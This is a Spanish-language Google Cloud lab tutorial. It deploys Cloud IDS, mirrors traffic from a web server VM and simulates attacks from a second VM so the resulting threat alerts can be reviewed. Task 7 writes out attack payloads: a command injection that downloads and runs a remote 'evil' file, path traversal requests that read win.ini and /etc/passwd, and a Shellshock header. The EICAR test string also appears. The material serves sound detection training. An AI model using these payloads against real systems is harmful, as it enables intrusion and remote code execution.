Descripción general

En este lab, implementarás el Sistema de Detección de Intrusiones de Cloud (IDS de Cloud), un servicio avanzado y de nueva generación para la detección de intrusiones. El IDS proporciona detección de amenazas de intrusiones, software malicioso, software espía y ataques de comando y control. Simularás varios ataques y revisarás los detalles de la amenaza en la consola de Google Cloud.

Objetivos

En este lab, aprenderás a realizar las siguientes tareas:

• Crear un entorno de red de Google Cloud como se mostró en el diagrama anterior
• Crear un extremo del IDS de Cloud
• Crear dos máquinas virtuales con los comandos de gcloud CLI
• Crear una política de duplicación de paquetes del IDS de Cloud
• Simular un tráfico de ataque desde una máquina virtual
• Revisar los detalles de la amenaza en la consola de Cloud y en Cloud Logging

Configuración

En cada lab, recibirás un proyecto de Google Cloud y un conjunto de recursos nuevos por tiempo limitado y sin costo adicional.

1. Haz clic en el botón Comenzar lab. Si debes pagar por el lab, se abrirá una ventana emergente para que selecciones tu forma de pago. A la izquierda, se encuentra el panel Detalles del lab, que tiene estos elementos:

   • El botón Abrir la consola de Google Cloud
   • El tiempo restante
   • Las credenciales temporales que debes usar para el lab
   • Otra información para completar el lab, si es necesaria

2. Haz clic en Abrir la consola de Google Cloud (o haz clic con el botón derecho y selecciona Abrir el vínculo en una ventana de incógnito si ejecutas el navegador Chrome).

   El lab inicia recursos y abre otra pestaña en la que se muestra la página de acceso.

   Sugerencia: Ordena las pestañas en ventanas separadas, una junto a la otra.

   Nota: Si ves el diálogo Elegir una cuenta, haz clic en Usar otra cuenta.

3. De ser necesario, copia el nombre de usuario a continuación y pégalo en el diálogo Acceder.

   {{{user_0.username | "Username"}}}

   También puedes encontrar el nombre de usuario en el panel Detalles del lab.

4. Haz clic en Siguiente.

5. Copia la contraseña que aparece a continuación y pégala en el diálogo Te damos la bienvenida.

   {{{user_0.password | "Password"}}}

   También puedes encontrar la contraseña en el panel Detalles del lab.

6. Haz clic en Siguiente.

   Importante: Debes usar las credenciales que te proporciona el lab. No uses las credenciales de tu cuenta de Google Cloud. Nota: Usar tu propia cuenta de Google Cloud para este lab podría generar cargos adicionales.

7. Haga clic para avanzar por las páginas siguientes:

   • Acepta los Términos y Condiciones.
   • No agregues opciones de recuperación o autenticación de dos factores (esta es una cuenta temporal).
   • No te registres para obtener pruebas gratuitas.

Después de un momento, se abrirá la consola de Google Cloud en esta pestaña.

Nota: Para ver un menú con una lista de productos y servicios de Google Cloud, haz clic en el menú de navegación que se encuentra en la parte superior izquierda o escribe el nombre del servicio o producto en el campo Búsqueda.

Activa Google Cloud Shell

Google Cloud Shell es una máquina virtual que cuenta con herramientas para desarrolladores. Ofrece un directorio principal persistente de 5 GB y se ejecuta en Google Cloud.

Google Cloud Shell proporciona acceso de línea de comandos a tus recursos de Google Cloud.

1. En la consola de Cloud, en la barra de herramientas superior derecha, haz clic en el botón Abrir Cloud Shell.

   

2. Haz clic en Continuar.

El aprovisionamiento y la conexión al entorno demorarán unos minutos. Cuando te conectes, habrás completado la autenticación, y el proyecto estará configurado con tu PROJECT_ID. Por ejemplo:

gcloud es la herramienta de línea de comandos de Google Cloud. Viene preinstalada en Cloud Shell y es compatible con el completado de línea de comando.

• Puedes solicitar el nombre de la cuenta activa con este comando:

gcloud auth list

Resultado:

Credentialed accounts: - @.com (active)

Resultado de ejemplo:

Credentialed accounts: - google1623327_student@qwiklabs.net

• Puedes solicitar el ID del proyecto con este comando:

gcloud config list project

Resultado:

[core] project =

Resultado de ejemplo:

[core] project = qwiklabs-gcp-44776a13dea667a6 Nota: La documentación completa de gcloud está disponible en la guía de descripción general de gcloud CLI .

Terminaremos este lab con los comandos de la CLI de gcloud dentro de Cloud Shell.

Tarea 1: Habilita las APIs

En esta tarea, establecerás la variable del ID del proyecto y, luego, habilitarás las APIs necesarias para el lab.

1. En Cloud Shell, para establecer la variable de entorno Project_ID, deberás ejecutar el siguiente comando:

export PROJECT_ID=$(gcloud config get-value project | sed '2d')

2. Habilita la API de Service Networking:

gcloud services enable servicenetworking.googleapis.com \ --project=$PROJECT_ID

Si se te solicita autorizar el comando, haz clic en Autorizar.

3. Habilita la API del IDS de Cloud:

gcloud services enable ids.googleapis.com \ --project=$PROJECT_ID

4. Habilita la API de Cloud Logging:

gcloud services enable logging.googleapis.com \ --project=$PROJECT_ID

Haz clic en Revisar mi progreso para verificar el objetivo. Habilitar las APIs

Tarea 2: Crea la infraestructura de red de Google Cloud

En esta tarea, crearás una red de VPC de Google Cloud y configurarás el acceso privado a servicios.

El acceso privado a servicios es una conexión privada entre tu red de VPC y una red que pertenece a Google o terceros. Las entidades que ofrecen servicios, como Google o terceros, también se conocen como productores de servicios.

La conexión privada permite que las instancias de máquinas virtuales (VM) de tu red de VPC y los servicios a los que accedes se comuniquen de forma exclusiva a través de las direcciones IP internas.

1. En Cloud Shell, para crear una VPC, ejecuta el siguiente comando:

gcloud compute networks create cloud-ids \ --subnet-mode=custom

Si se te solicita autorizar el comando, haz clic en Autorizar.

2. Agrega una subred a la VPC para el tráfico duplicado en us-east1:

gcloud compute networks subnets create cloud-ids-useast1 \ --range=192.168.10.0/24 \ --network=cloud-ids \ --region=us-east1

3. Configura el acceso privado a servicios:

gcloud compute addresses create cloud-ids-ips \ --global \ --purpose=VPC_PEERING \ --addresses=10.10.10.0 \ --prefix-length=24 \ --description="Cloud IDS Range" \ --network=cloud-ids

4. Crea una conexión privada:

gcloud services vpc-peerings connect \ --service=servicenetworking.googleapis.com \ --ranges=cloud-ids-ips \ --network=cloud-ids \ --project=$PROJECT_ID

Haz clic en Revisar mi progreso para verificar el objetivo. Crear una VPC

Tarea 3: Crea un extremo del IDS de Cloud

En esta tarea, crearás un extremo del IDS de Cloud en us-east1 con una gravedad establecida en informativa.

IDS de Cloud usa un recurso conocido como extremo de IDS, es un recurso zonal que puede inspeccionar el tráfico de cualquier zona de su región. Cada extremo de IDS recibe tráfico duplicado y realiza un análisis de detección de amenazas.

Nota: La creación de un extremo de IDS requiere alrededor de unos 20 minutos.

1. Para crear un extremo del IDS de Cloud, en Cloud Shell, ejecuta el siguiente comando:

gcloud ids endpoints create cloud-ids-east1 \ --network=cloud-ids \ --zone=us-east1-b \ --severity=INFORMATIONAL \ --async

2. Verifica que el extremo de IDS de Cloud se pudo iniciar:

gcloud ids endpoints list --project=$PROJECT_ID

Si te aparece el mensaje Would you like to enable and retry, presiona Y.

El resultado debe ser similar a este:

ID: cloud-ids-east1 LOCATION: us-east1-b SEVERITY: INFORMATIONAL STATE: CREATING NETWORK: cloud-ids TRAFFIC_LOGS:

Haz clic en Revisar mi progreso para verificar el objetivo. Crear un extremo de IDS de Cloud

Tarea 4: Crea las reglas de firewall y Cloud NAT

En esta tarea, crearás dos reglas de firewall: allow-http-icmp y allow-iap-proxy.

Para habilitar las conexiones de puerto http estándar (TCP 80) y las del protocolo ICMP en la VM del servidor desde todas las fuentes de la red de cloud-ids, debes definir la regla allow-http-icmp.

Para habilitar las conexiones SSH a las VMs desde el rango de IP de Identity-Aware Proxy, debes definir la regla allow-iap-proxy_.

También debes configurar Cloud Router y, luego, Cloud NAT. Para usar Cloud NAT, primero debes configurar un Cloud Router en la misma región. Para proporcionarles acceso a Internet a las VMs que no tengan una dirección IP pública, debes crear un Cloud NAT en la misma región. Para asegurarnos de que las VMs son inaccesibles desde Internet, se crearán sin una dirección IP pública. Sin embargo, necesitarán acceso a Internet para poder descargar actualizaciones y archivos.

1. Para crear la regla allow-http-icmp, ejecuta el siguiente comando en Cloud Shell:

gcloud compute firewall-rules create allow-http-icmp \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:80,icmp \ --source-ranges=0.0.0.0/0 \ --target-tags=server

2. Crea la regla allow-iap-proxy:

gcloud compute firewall-rules create allow-iap-proxy \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:22 \ --source-ranges=35.235.240.0/20

Haz clic en Revisar mi progreso para verificar el objetivo. Agregar reglas de firewall a la VPC.

3. Para crear un Cloud Router, ejecuta el siguiente comando:

gcloud compute routers create cr-cloud-ids-useast1 \ --region=us-east1 \ --network=cloud-ids

4. Para configurar un Cloud NAT, ejecuta el siguiente comando:

gcloud compute routers nats create nat-cloud-ids-useast1 \ --router=cr-cloud-ids-useast1 \ --router-region=us-east1 \ --auto-allocate-nat-external-ips \ --nat-all-subnet-ip-ranges

Haz clic en Revisar mi progreso para verificar el objetivo. Crear un Cloud Router.

Tarea 5: Crea dos máquinas virtuales

En esta tarea, crearás dos máquinas virtuales (VMs). La primera será tu servidor web, que se duplicará en el IDS de Cloud. La segunda será la fuente de tu tráfico de ataque.

Establece una conexión SSH a tu servidor a través de Identity-Aware Proxy (IAP), comprueba el estado de tu servidor de servicios web, crea en el servidor web un archivo de software malicioso benigno y agrégale contenido al archivo.

1. Para crear una máquina virtual que sirva como un servidor duplicado del IDS de Cloud, ejecuta el siguiente comando en Cloud Shell:

gcloud compute instances create server \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.20 \ --metadata=startup-script=\#\!\ /bin/bash$'\n'sudo\ apt-get\ update$'\n'sudo\ apt-get\ -qq\ -y\ install\ nginx \ --tags=server \ --image=debian-11-bullseye-v20240709 \ --image-project=debian-cloud \ --boot-disk-size=10GB

Este comando crea un servidor Debian en us-east1 y también instala un servicio web sencillo.

2. Crea una máquina virtual para simular un cliente que envía tráfico de ataque:

gcloud compute instances create attacker \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.10 \ --image=debian-11-bullseye-v20240709 \ --image-project=debian-cloud \ --boot-disk-size=10GB

Este comando prepara un servidor Debian en us-east1 para usarlo como cliente.

Haz clic en Revisar mi progreso para verificar el objetivo. Crear una máquina virtual.

Prepara el servidor

En este procedimiento, validarás tu servidor y, luego, crearás una carga útil de software malicioso benigno para tu cliente.

1. Para establecer una conexión SSH con tu servidor a través de IAP, ejecuta el siguiente comando:

gcloud compute ssh server --zone=us-east1-b --tunnel-through-iap

Este comando te pedirá que realices una serie de pasos para crear una clave SSH y los directorios necesarios.

2. Para aceptar la solicitud de creación del directorio, escribe Y.

3. Cuando se te solicite una frase de contraseña, presiona INTRO dos veces para usar una en blanco.

Ahora, estás en la shell de tu VM del servidor.

Confirma que el servicio web se está ejecutando

En este procedimiento, comprueba el estado del servidor de servicios web. Crea un archivo de software malicioso benigno en el servidor web y agrégale contenido.

1. Para comprobar el estado de tu servicio web, ejecuta el siguiente comando de Linux:

sudo systemctl status nginx

El resultado debe ser similar a este:

● nginx.service - A high performance web server and a reverse proxy server Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled) Active: active (running) since Tue 2021-05-25 18:01:49 UTC; 5h 24 min ago Docs: man:nginx(8) Main PID: 1347 (nginx) Tasks: 3 (limit: 4665) Memory: 4.5M CGroup: /system.slice/nginx.service ├─1347 nginx: master process /usr/sbin/nginx -g daemon on; master_process on; ├─1348 nginx: worker process └─1349 nginx: worker process May 25 18:01:49 server systemd[1]: Starting A high performance web server and a reverse proxy server... May 25 18:01:49 server systemd[1]: Started A high performance web server and a reverse proxy server.

2. Cambia el directorio al servicio web:

cd /var/www/html

3. Crea un archivo de software malicioso benigno en el servidor web. Ejecuta el siguiente comando de Linux para crear un archivo de texto:

sudo touch eicar.file

4. Agrega el siguiente contenido al archivo:

echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | sudo tee eicar.file

5. Sal de la shell de la VM del servidor y vuelve a Cloud Shell:

exit

Tarea 6: Crea una política de duplicación de paquetes del IDS de Cloud

En esta tarea, crearás una política de duplicación de paquetes del IDS de Cloud. Esta política determina qué tráfico del IDS de Cloud se duplicará. Luego, adjuntarás esta política al nuevo extremo del IDS de Cloud.

Como ya mencionamos, la creación del extremo del IDS de Cloud toma tiempo. Antes de que puedas continuar con este lab, el estado del extremo debe estar activo o listo.

1. Para verificar que el extremo del IDS de Cloud está activo, ejecuta el siguiente comando en Cloud Shell, y verás su estado actual:

gcloud ids endpoints list --project=$PROJECT_ID | grep STATE

El resultado debe ser similar a este:

STATE: READY

Ejecuta este comando cada algunos minutos hasta que el estado diga READY.

2. Identifica la regla de reenvío del extremo y confirma que su estado diga READY:

export FORWARDING_RULE=$(gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b --format="value(endpointForwardingRule)") echo $FORWARDING_RULE

El resultado debe ser similar a este:

https://www.googleapis.com/compute/v1/projects/md975a7fa0a53145dp-tp/regions/us-east1/forwardingRules/ids-fr-cloud--xkkerutlagop6opm

3. Crea y adjunta la política de duplicación de paquetes:

gcloud compute packet-mirrorings create cloud-ids-packet-mirroring \ --region=us-east1 \ --collector-ilb=$FORWARDING_RULE \ --network=cloud-ids \ --mirrored-subnets=cloud-ids-useast1

Haz clic en Revisar mi progreso para verificar el objetivo. Crear y adjuntar la política de duplicación de paquetes.

4. Verifica que la política se creó:

gcloud compute packet-mirrorings list

Este comando de gcloud enumera las políticas de duplicación de paquetes y muestra si están habilitadas o inhabilitadas.

El resultado debe ser similar a este:

NAME: cloud-ids-packet-mirroring REGION: us-east1 NETWORK: cloud-ids ENABLE: TRUE

Tarea 7: Simula tráfico de ataque

En esta tarea, establecerás una conexión SSH a tu máquina virtual atacante y simularás el tráfico que atacará a tu servidor desde una máquina virtual. Deberás ejecutar una selección de comandos curl con una gravedad que va desde baja a crítica.

1. Para establecer a través de IAP una conexión SSH en tu máquina virtual atacante, ejecuta el siguiente comando en Cloud Shell:

gcloud compute ssh attacker --zone=us-east1-b --tunnel-through-iap Nota: Ahora estás en la shell de tu VM atacante y no en la máquina de Cloud Shell.

2. Ejecuta en secuencia las siguientes solicitudes curl para simular las alertas de gravedad baja, media, alta y crítica en el IDS:

Gravedad baja:

curl "http://192.168.10.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"

Gravedad media:

curl http://192.168.10.20/?item=../../../../WINNT/win.ini curl http://192.168.10.20/eicar.file

Gravedad alta:

curl http://192.168.10.20/cgi-bin/../../../..//bin/cat%20/etc/passwd

Gravedad crítica:

curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://192.168.10.20/cgi-bin/test-critical

3. Sal de la shell de la máquina virtual atacante y vuelve a Cloud Shell:

exit

Tarea 8: Revisa las amenazas que detectó el IDS de Cloud

En esta tarea, revisarás en la consola de Cloud los distintos tráficos de ataque capturados por el IDS de Cloud. Los perfiles del tráfico de ataque capturados proporcionan detalles sobre cada amenaza.

1. En la consola de Google Cloud, en Menú de navegación (), haz clic en Seguridad de red > IDS de Cloud.

2. Haz clic en la pestaña Amenazas.

El IDS de Cloud capturó varios perfiles de tráfico de ataque y proporcionó los detalles de cada amenaza. Quizás debas hacer clic en Actualizar si no aparece ninguna amenaza. Ahora puedes profundizar y revisar los detalles de la amenaza.

3. Localiza la amenaza Bash Remote Code Execution Vulnerability, haz clic en Más () y, luego, selecciona Ver detalles de la amenaza.

Nota: Quizás notaste que hay múltiples amenazas que tienen el mismo nombre, por ejemplo, “Bash Remote Code Execution Vulnerability”. Este comportamiento es normal.

Si te fijas bien, notarás que los IDs de sesión de las amenazas son diferentes. Como las dos VMs que creaste están en la misma subred, los paquetes del cliente y del servidor están duplicados. Los paquetes salientes del cliente y los entrantes en el servidor se duplican en el IDS.

4. Ahora puedes ver los detalles de este incidente en Cloud Logging. Para volver a la página Amenazas, haz clic en la flecha hacia la izquierda.

5. Haz clic en la pestaña Amenazas.

6. Encuentra la Bash Remote Code Execution Vulnerability, haz clic en Más y selecciona Ver registros de amenazas.

Se abrirá una nueva pestaña de Cloud Logging con los mismos detalles. Esto te permite enviar los registros a Cloud Storage, Chronicle o cualquier SIEM/SOAR. También puedes crear flujos de trabajo personalizados para ejecutar una acción del solucionador basada en alertas, por ejemplo, crear una Cloud Function que se active cuando reciba una alerta y cree o actualice una regla de firewall para bloquear la dirección IP o crear o actualizar una política de Google Cloud Armor.

Haz clic en Revisar mi progreso para verificar el objetivo. Comenzar a usar el IDS de Cloud

¡Felicitaciones!

En este lab, realizaste las siguientes tareas:

1. Creaste una nueva VPC y también implementaste un extremo del IDS de Cloud.

2. Implementaste dos VMs, creaste una política de duplicación de paquetes y, luego, enviaste tráfico de ataque.

3. Verificaste que el IDS de Cloud haya capturado las amenazas, para esto revisaste los detalles de la amenaza en la consola de Cloud y los registros de amenazas en Cloud Logging.

Más recursos

Si quieres adquirir más experiencia con el IDS de Cloud, prueba estos labs:

• Detecta ataques con IDS de CLOUD y luego bloquéalos con Cortex XSOAR
• Serie sobre la seguridad de la red de Cloud con el IDS de Cloud y VMs

Finalice su lab

Cuando haya completado el lab, haga clic en Finalizar lab. Google Cloud Skills Boost quitará los recursos que usó y limpiará la cuenta.

Tendrá la oportunidad de calificar su experiencia en el lab. Seleccione la cantidad de estrellas que corresponda, ingrese un comentario y haga clic en Enviar.

La cantidad de estrellas indica lo siguiente:

• 1 estrella = Muy insatisfecho
• 2 estrellas = Insatisfecho
• 3 estrellas = Neutral
• 4 estrellas = Satisfecho
• 5 estrellas = Muy satisfecho

Puede cerrar el cuadro de diálogo si no desea proporcionar comentarios.

Para enviar comentarios, sugerencias o correcciones, use la pestaña Asistencia.

Copyright 2020 Google LLC. All rights reserved. Google y el logotipo de Google son marcas de Google LLC. Los demás nombres de productos y empresas pueden ser marcas de las respectivas empresas a las que estén asociados.